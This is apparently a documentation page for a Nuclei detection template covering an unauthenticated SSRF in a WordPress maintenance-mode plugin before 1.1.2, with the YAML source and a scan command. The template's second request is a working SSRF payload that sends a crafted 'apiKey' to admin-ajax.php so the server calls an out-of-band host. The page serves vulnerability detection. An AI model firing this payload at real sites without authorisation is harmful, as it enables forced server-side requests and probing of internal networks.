Skip to content
Nuclei Templates

Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF)

ID: wp-under-construction-ssrf

Severity: high

Author: Akincibor

Tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm

Description

Section titled “Description”

The includes/mc-get_lists.php file used the ‘apiKey’ POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users).

YAML Source

Section titled “YAML Source”
id: wp-under-construction-ssrf


info:
  name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF)
  author: Akincibor
  severity: high
  description: |
    The includes/mc-get_lists.php file used the 'apiKey' POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users).
  reference:
    - https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc
    - https://packetstormsecurity.com/files/161576/
  metadata:
    verified: true
    max-request: 2
  tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        internal: true
        words:
          - '= Under Construction'


  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/2
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded


        action=ucmm_mc_api&apiKey=-{{interactsh-url}}%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a004630440220257d46e64ec9fdbc78d35e517cabd2f587276ea5fdab07acd47bea63587bff290220260e5ea03b42b02fb851cab64bdfd54c039083c319c283d256582ab89de7e4ff:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml"

View on Github